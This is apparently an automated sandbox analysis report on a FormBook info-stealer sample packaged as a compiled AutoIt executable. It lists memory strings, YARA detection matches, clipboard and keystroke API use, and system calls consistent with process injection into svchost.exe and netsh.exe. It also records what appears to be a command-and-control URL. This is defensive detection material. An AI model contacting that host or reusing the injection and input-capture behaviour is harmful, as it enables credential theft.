          Source: explorer.exe, 00000002.00000002.4147214666.0000000007900000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000000.1711936620.0000000007900000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://cdn.query.prod.cms.msn.com/cms/api/amp/binary/AA13gMeu-dark
          Source: explorer.exe, 00000002.00000002.4147214666.0000000007900000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000000.1711936620.0000000007900000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://cdn.query.prod.cms.msn.com/cms/api/amp/binary/AA13gTUY
          Source: explorer.exe, 00000002.00000002.4147214666.0000000007900000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000000.1711936620.0000000007900000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://cdn.query.prod.cms.msn.com/cms/api/amp/binary/AA13gTUY-dark
          Source: explorer.exe, 00000002.00000002.4157772828.000000000C5AA000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000003.3108835540.000000000C5E2000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000000.1718215415.000000000C5E4000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000003.3478580226.000000000C5E2000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://excel.office.com
          Source: explorer.exe, 00000002.00000002.4147214666.0000000007900000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000000.1711936620.0000000007900000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://img-s-msn-com.akamaized.net/tenant/amp/entityid/AA15Yat4.img
          Source: explorer.exe, 00000002.00000002.4147214666.0000000007900000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000000.1711936620.0000000007900000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://img-s-msn-com.akamaized.net/tenant/amp/entityid/AA1hlXIY.img
          Source: explorer.exe, 00000002.00000002.4147214666.0000000007900000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000000.1711936620.0000000007900000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://img-s-msn-com.akamaized.net/tenant/amp/entityid/AAKSoFp.img
          Source: explorer.exe, 00000002.00000002.4147214666.0000000007900000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000000.1711936620.0000000007900000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://img-s-msn-com.akamaized.net/tenant/amp/entityid/AAXaopi.img
          Source: explorer.exe, 00000002.00000002.4147214666.0000000007900000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000000.1711936620.0000000007900000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://img-s-msn-com.akamaized.net/tenant/amp/entityid/AAgi0nZ.img
          Source: explorer.exe, 00000002.00000002.4147214666.0000000007900000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000000.1711936620.0000000007900000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://img-s-msn-com.akamaized.net/tenant/amp/entityid/BBqlLky.img
          Source: explorer.exe, 00000002.00000000.1711936620.00000000078AD000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000002.4147214666.00000000078AD000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://img.s-msn.com/tenant/amp/entityid/AAbC0oi.img
          Source: explorer.exe, 00000002.00000002.4157772828.000000000C5AA000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000003.3108835540.000000000C5E2000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000000.1718215415.000000000C5E4000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000003.3478580226.000000000C5E2000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://outlook.com_
          Source: explorer.exe, 00000002.00000002.4157772828.000000000C5AA000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000003.3108835540.000000000C5E2000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000000.1718215415.000000000C5E4000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000003.3478580226.000000000C5E2000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://powerpoint.office.comcember
          Source: explorer.exe, 00000002.00000002.4147214666.0000000007900000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000000.1711936620.0000000007900000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://simpleflying.com/how-do-you-become-an-air-traffic-controller/
          Source: explorer.exe, 00000002.00000002.4160740233.00000000112AF000.00000004.80000000.00040000.00000000.sdmp, netsh.exe, 00000003.00000002.4144970692.0000000003FBF000.00000004.10000000.00040000.00000000.sdmpString found in binary or memory: https://urbanholidayz.com/jd21/?4h6=58Yhl8pxScvjrZW7vdX/11LwICGJdJmrB7bkiksH/i9UnBAUhv3EZPgtL2ZDcYGs
          Source: explorer.exe, 00000002.00000002.4147214666.0000000007900000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000000.1711936620.0000000007900000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://windows.msn.com:443/shell?osLocale=en-GB&chosenMarketReason=ImplicitNew
          Source: explorer.exe, 00000002.00000002.4147214666.0000000007900000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000000.1711936620.0000000007900000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://windows.msn.com:443/shellv2?osLocale=en-GB&chosenMarketReason=ImplicitNew
          Source: explorer.exe, 00000002.00000002.4157772828.000000000C557000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000000.1718215415.000000000C557000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://wns.windows.com/L
          Source: explorer.exe, 00000002.00000002.4157772828.000000000C5AA000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000003.3108835540.000000000C5E2000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000000.1718215415.000000000C5E4000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000003.3478580226.000000000C5E2000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://word.office.com
          Source: explorer.exe, 00000002.00000002.4147214666.0000000007900000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000000.1711936620.0000000007900000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://www.msn.com/en-us/lifestyle/lifestyle-buzz/biden-makes-decision-that-will-impact-more-than-1
          Source: explorer.exe, 00000002.00000002.4147214666.0000000007900000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000000.1711936620.0000000007900000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://www.msn.com/en-us/lifestyle/travel/i-ve-worked-at-a-campsite-for-5-years-these-are-the-15-mi
          Source: explorer.exe, 00000002.00000002.4147214666.0000000007900000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000000.1711936620.00000000078AD000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000002.4147214666.00000000078AD000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000000.1711936620.0000000007900000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://www.msn.com/en-us/money/personalfinance/13-states-that-don-t-tax-your-retirement-income/ar-A
          Source: explorer.exe, 00000002.00000002.4147214666.0000000007900000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000000.1711936620.0000000007900000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://www.msn.com/en-us/money/personalfinance/no-wonder-the-american-public-is-confused-if-you-re-
          Source: explorer.exe, 00000002.00000002.4147214666.0000000007900000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000000.1711936620.0000000007900000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://www.msn.com/en-us/news/politics/clarence-thomas-in-spotlight-as-supreme-court-delivers-blow-
          Source: explorer.exe, 00000002.00000002.4147214666.0000000007900000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000000.1711936620.0000000007900000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://www.msn.com/en-us/news/politics/exclusive-john-kelly-goes-on-the-record-to-confirm-several-d
          Source: explorer.exe, 00000002.00000002.4147214666.0000000007900000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000000.1711936620.0000000007900000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://www.msn.com/en-us/news/topic/breast%20cancer%20awareness%20month?ocid=winp1headerevent
          Source: explorer.exe, 00000002.00000002.4147214666.0000000007900000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000000.1711936620.0000000007900000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://www.msn.com/en-us/news/us/a-nationwide-emergency-alert-will-be-sent-to-all-u-s-cellphones-we
          Source: explorer.exe, 00000002.00000002.4147214666.0000000007900000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000000.1711936620.0000000007900000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://www.msn.com/en-us/news/us/metro-officials-still-investigating-friday-s-railcar-derailment/ar
          Source: explorer.exe, 00000002.00000002.4147214666.00000000078AD000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://www.msn.com/en-us/news/us/when-does-daylight-saving-time-end-2023-here-s-when-to-set-your-cl
          Source: explorer.exe, 00000002.00000002.4147214666.0000000007900000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000000.1711936620.0000000007900000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://www.msn.com/en-us/news/world/agostini-krausz-and-l-huillier-win-physics-nobel-for-looking-at
          Source: explorer.exe, 00000002.00000002.4147214666.0000000007900000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000000.1711936620.0000000007900000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://www.msn.com/en-us/weather/topstories/rest-of-hurricane-season-in-uncharted-waters-because-of
          Source: explorer.exe, 00000002.00000002.4147214666.0000000007900000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000000.1711936620.0000000007900000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://www.msn.com/en-us/weather/topstories/us-weather-super-el-nino-to-bring-more-flooding-and-win
          Source: explorer.exe, 00000002.00000002.4147214666.0000000007900000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000000.1711936620.0000000007900000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://www.msn.com:443/en-us/feed
          Source: explorer.exe, 00000002.00000002.4147214666.0000000007900000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000000.1711936620.0000000007900000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://www.rd.com/list/polite-habits-campers-dislike/
          Source: explorer.exe, 00000002.00000002.4147214666.0000000007900000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000000.1711936620.0000000007900000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://www.rd.com/newsletter/?int_source=direct&int_medium=rd.com&int_campaign=nlrda_20221001_toppe
          Source: C:\Users\user\Desktop\8t1uarSZFV.exeCode function: 0_2_0101EAFF OpenClipboard,IsClipboardFormatAvailable,IsClipboardFormatAvailable,GetClipboardData,CloseClipboard,GlobalLock,CloseClipboard,GlobalUnlock,IsClipboardFormatAvailable,GetClipboardData,GlobalLock,GlobalUnlock,IsClipboardFormatAvailable,GetClipboardData,GlobalLock,DragQueryFileW,DragQueryFileW,DragQueryFileW,GlobalUnlock,CountClipboardFormats,CloseClipboard,0_2_0101EAFF
          Source: C:\Users\user\Desktop\8t1uarSZFV.exeCode function: 0_2_0101ED6A OpenClipboard,EmptyClipboard,GlobalAlloc,GlobalLock,GlobalUnlock,OpenClipboard,EmptyClipboard,SetClipboardData,CloseClipboard,0_2_0101ED6A
          Source: C:\Users\user\Desktop\8t1uarSZFV.exeCode function: 0_2_0101EAFF OpenClipboard,IsClipboardFormatAvailable,IsClipboardFormatAvailable,GetClipboardData,CloseClipboard,GlobalLock,CloseClipboard,GlobalUnlock,IsClipboardFormatAvailable,GetClipboardData,GlobalLock,GlobalUnlock,IsClipboardFormatAvailable,GetClipboardData,GlobalLock,DragQueryFileW,DragQueryFileW,DragQueryFileW,GlobalUnlock,CountClipboardFormats,CloseClipboard,0_2_0101EAFF
          Source: C:\Users\user\Desktop\8t1uarSZFV.exeCode function: 0_2_0100AB9C GetKeyState,GetKeyboardState,SetKeyboardState,PostMessageW,SendInput,0_2_0100AB9C
          Source: C:\Users\user\Desktop\8t1uarSZFV.exeCode function: 0_2_01039576 DefDlgProcW,SendMessageW,GetWindowLongW,SendMessageW,SendMessageW,GetKeyState,GetKeyState,GetKeyState,SendMessageW,GetKeyState,SendMessageW,SendMessageW,SendMessageW,ImageList_SetDragCursorImage,ImageList_BeginDrag,SetCapture,ClientToScreen,ImageList_DragEnter,InvalidateRect,ReleaseCapture,GetCursorPos,ScreenToClient,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,GetCursorPos,ScreenToClient,GetParent,SendMessageW,SendMessageW,ClientToScreen,TrackPopupMenuEx,SendMessageW,SendMessageW,ClientToScreen,TrackPopupMenuEx,GetWindowLongW,0_2_01039576

          E-Banking Fraud

          barindex
          Yara detected FormBook
          Source: Yara matchFile source: 1.2.svchost.exe.400000.0.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 0.2.8t1uarSZFV.exe.f10000.0.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 0.2.8t1uarSZFV.exe.f10000.0.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 1.2.svchost.exe.400000.0.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 00000003.00000002.4143896558.0000000000E50000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000001.00000002.1763621828.0000000000400000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000003.00000002.4143556065.0000000000940000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000001.00000002.1763854719.0000000000D40000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000000.00000002.1708200565.0000000000F10000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000003.00000002.4143849361.0000000000E20000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000001.00000002.1763894403.0000000000D70000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY

          System Summary

          barindex
          Malicious sample detected (through community Yara rule)
          Source: 1.2.svchost.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
          Source: 1.2.svchost.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 1.2.svchost.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 0.2.8t1uarSZFV.exe.f10000.0.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
          Source: 0.2.8t1uarSZFV.exe.f10000.0.unpack, type: UNPACKEDPEMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 0.2.8t1uarSZFV.exe.f10000.0.unpack, type: UNPACKEDPEMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 0.2.8t1uarSZFV.exe.f10000.0.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
          Source: 0.2.8t1uarSZFV.exe.f10000.0.raw.unpack, type: UNPACKEDPEMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 0.2.8t1uarSZFV.exe.f10000.0.raw.unpack, type: UNPACKEDPEMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 1.2.svchost.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
          Source: 1.2.svchost.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 1.2.svchost.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000003.00000002.4143896558.0000000000E50000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
          Source: 00000003.00000002.4143896558.0000000000E50000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000003.00000002.4143896558.0000000000E50000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000001.00000002.1763621828.0000000000400000.00000040.80000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
          Source: 00000001.00000002.1763621828.0000000000400000.00000040.80000000.00040000.00000000.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000001.00000002.1763621828.0000000000400000.00000040.80000000.00040000.00000000.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000003.00000002.4143556065.0000000000940000.00000040.80000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
          Source: 00000003.00000002.4143556065.0000000000940000.00000040.80000000.00040000.00000000.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000003.00000002.4143556065.0000000000940000.00000040.80000000.00040000.00000000.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000001.00000002.1763854719.0000000000D40000.00000040.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
          Source: 00000001.00000002.1763854719.0000000000D40000.00000040.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000001.00000002.1763854719.0000000000D40000.00000040.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000000.00000002.1708200565.0000000000F10000.00000004.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
          Source: 00000000.00000002.1708200565.0000000000F10000.00000004.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000000.00000002.1708200565.0000000000F10000.00000004.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000003.00000002.4143849361.0000000000E20000.00000040.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
          Source: 00000003.00000002.4143849361.0000000000E20000.00000040.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000003.00000002.4143849361.0000000000E20000.00000040.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000001.00000002.1763894403.0000000000D70000.00000040.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
          Source: 00000001.00000002.1763894403.0000000000D70000.00000040.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000001.00000002.1763894403.0000000000D70000.00000040.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: Process Memory Space: 8t1uarSZFV.exe PID: 7292, type: MEMORYSTRMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
          Source: Process Memory Space: svchost.exe PID: 7312, type: MEMORYSTRMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
          Source: Process Memory Space: netsh.exe PID: 7396, type: MEMORYSTRMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
          Binary is likely a compiled AutoIt script file
          Source: 8t1uarSZFV.exeString found in binary or memory: This is a third-party compiled AutoIt script.
          Source: 8t1uarSZFV.exe, 00000000.00000000.1684216333.0000000001062000.00000002.00000001.01000000.00000003.sdmpString found in binary or memory: This is a third-party compiled AutoIt script.memstr_a30fc377-d
          Source: 8t1uarSZFV.exe, 00000000.00000000.1684216333.0000000001062000.00000002.00000001.01000000.00000003.sdmpString found in binary or memory: AnyArabicArmenianAvestanBalineseBamumBassa_VahBatakBengaliBopomofoBrahmiBrailleBugineseBuhidCCanadian_AboriginalCarianCaucasian_AlbanianCcCfChakmaChamCherokeeCnCoCommonCopticCsCuneiformCypriotCyrillicDeseretDevanagariDuployanEgyptian_HieroglyphsElbasanEthiopicGeorgianGlagoliticGothicGranthaGreekGujaratiGurmukhiHanHangulHanunooHebrewHiraganaImperial_AramaicInheritedInscriptional_PahlaviInscriptional_ParthianJavaneseKaithiKannadaKatakanaKayah_LiKharoshthiKhmerKhojkiKhudawadiLL&LaoLatinLepchaLimbuLinear_ALinear_BLisuLlLmLoLtLuLycianLydianMMahajaniMalayalamMandaicManichaeanMcMeMeetei_MayekMende_KikakuiMeroitic_CursiveMeroitic_HieroglyphsMiaoMnModiMongolianMroMyanmarNNabataeanNdNew_Tai_LueNkoNlNoOghamOl_ChikiOld_ItalicOld_North_ArabianOld_PermicOld_PersianOld_South_ArabianOld_TurkicOriyaOsmanyaPPahawh_HmongPalmyrenePau_Cin_HauPcPdPePfPhags_PaPhoenicianPiPoPsPsalter_PahlaviRejangRunicSSamaritanSaurashtraScSharadaShavianSiddhamSinhalaSkSmSoSora_SompengSundaneseSyloti_NagriSyriacTagalogTagbanwaTai_LeTai_ThamTai_VietTakriTamilTeluguThaanaThaiTibetanTifinaghTirhutaUgariticVaiWarang_CitiXanXpsXspXucXwdYiZZlZpZsSDSOFTWARE\Classes\\CLSID\\\IPC$This is a third-party compiled AutoIt script."runasError allocating memory.SeAssignPrimaryTokenPrivilegeSeIncreaseQuotaPrivilegeSeBackupPrivilegeSeRestorePrivilegewinsta0defaultwinsta0\defaultComboBoxListBoxSHELLDLL_DefViewlargeiconsdetailssmalliconslistCLASSCLASSNNREGEXPCLASSIDNAMEXYWHINSTANCETEXT%s%u%s%dLAST[LASTACTIVE[ACTIVEHANDLE=[HANDLE:REGEXP=[REGEXPTITLE:CLASSNAME=[CLASS:ALL[ALL]HANDLEREGEXPTITLETITLEThumbnailClassAutoIt3GUIContainermemstr_ce7cf190-6
          Source: 8t1uarSZFV.exeString found in binary or memory: This is a third-party compiled AutoIt script.memstr_318fc6fc-4
          Source: 8t1uarSZFV.exeString found in binary or memory: AnyArabicArmenianAvestanBalineseBamumBassa_VahBatakBengaliBopomofoBrahmiBrailleBugineseBuhidCCanadian_AboriginalCarianCaucasian_AlbanianCcCfChakmaChamCherokeeCnCoCommonCopticCsCuneiformCypriotCyrillicDeseretDevanagariDuployanEgyptian_HieroglyphsElbasanEthiopicGeorgianGlagoliticGothicGranthaGreekGujaratiGurmukhiHanHangulHanunooHebrewHiraganaImperial_AramaicInheritedInscriptional_PahlaviInscriptional_ParthianJavaneseKaithiKannadaKatakanaKayah_LiKharoshthiKhmerKhojkiKhudawadiLL&LaoLatinLepchaLimbuLinear_ALinear_BLisuLlLmLoLtLuLycianLydianMMahajaniMalayalamMandaicManichaeanMcMeMeetei_MayekMende_KikakuiMeroitic_CursiveMeroitic_HieroglyphsMiaoMnModiMongolianMroMyanmarNNabataeanNdNew_Tai_LueNkoNlNoOghamOl_ChikiOld_ItalicOld_North_ArabianOld_PermicOld_PersianOld_South_ArabianOld_TurkicOriyaOsmanyaPPahawh_HmongPalmyrenePau_Cin_HauPcPdPePfPhags_PaPhoenicianPiPoPsPsalter_PahlaviRejangRunicSSamaritanSaurashtraScSharadaShavianSiddhamSinhalaSkSmSoSora_SompengSundaneseSyloti_NagriSyriacTagalogTagbanwaTai_LeTai_ThamTai_VietTakriTamilTeluguThaanaThaiTibetanTifinaghTirhutaUgariticVaiWarang_CitiXanXpsXspXucXwdYiZZlZpZsSDSOFTWARE\Classes\\CLSID\\\IPC$This is a third-party compiled AutoIt script."runasError allocating memory.SeAssignPrimaryTokenPrivilegeSeIncreaseQuotaPrivilegeSeBackupPrivilegeSeRestorePrivilegewinsta0defaultwinsta0\defaultComboBoxListBoxSHELLDLL_DefViewlargeiconsdetailssmalliconslistCLASSCLASSNNREGEXPCLASSIDNAMEXYWHINSTANCETEXT%s%u%s%dLAST[LASTACTIVE[ACTIVEHANDLE=[HANDLE:REGEXP=[REGEXPTITLE:CLASSNAME=[CLASS:ALL[ALL]HANDLEREGEXPTITLETITLEThumbnailClassAutoIt3GUIContainermemstr_ce7b8d72-4
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0041A350 NtCreateFile,1_2_0041A350
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0041A400 NtReadFile,1_2_0041A400
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0041A480 NtClose,1_2_0041A480
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0041A530 NtAllocateVirtualMemory,1_2_0041A530
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0041A47A NtClose,1_2_0041A47A
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03012B60 NtClose,LdrInitializeThunk,1_2_03012B60
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03012BF0 NtAllocateVirtualMemory,LdrInitializeThunk,1_2_03012BF0
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03012AD0 NtReadFile,LdrInitializeThunk,1_2_03012AD0
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03012F30 NtCreateSection,LdrInitializeThunk,1_2_03012F30
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03012F90 NtProtectVirtualMemory,LdrInitializeThunk,1_2_03012F90
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03012FB0 NtResumeThread,LdrInitializeThunk,1_2_03012FB0
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03012FE0 NtCreateFile,LdrInitializeThunk,1_2_03012FE0
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03012E80 NtReadVirtualMemory,LdrInitializeThunk,1_2_03012E80
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03012EA0 NtAdjustPrivilegesToken,LdrInitializeThunk,1_2_03012EA0
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03012D10 NtMapViewOfSection,LdrInitializeThunk,1_2_03012D10
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03012D30 NtUnmapViewOfSection,LdrInitializeThunk,1_2_03012D30
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03012DD0 NtDelayExecution,LdrInitializeThunk,1_2_03012DD0
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03012DF0 NtQuerySystemInformation,LdrInitializeThunk,1_2_03012DF0
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03012CA0 NtQueryInformationToken,LdrInitializeThunk,1_2_03012CA0
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03014340 NtSetContextThread,1_2_03014340
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03014650 NtSuspendThread,1_2_03014650
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03012B80 NtQueryInformationFile,1_2_03012B80
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03012BA0 NtEnumerateValueKey,1_2_03012BA0
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03012BE0 NtQueryValueKey,1_2_03012BE0
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03012AB0 NtWaitForSingleObject,1_2_03012AB0
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03012AF0 NtWriteFile,1_2_03012AF0
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03012F60 NtCreateProcessEx,1_2_03012F60
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03012FA0 NtQuerySection,1_2_03012FA0
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03012E30 NtWriteVirtualMemory,1_2_03012E30
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03012EE0 NtQueueApcThread,1_2_03012EE0
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03012D00 NtSetInformationFile,1_2_03012D00
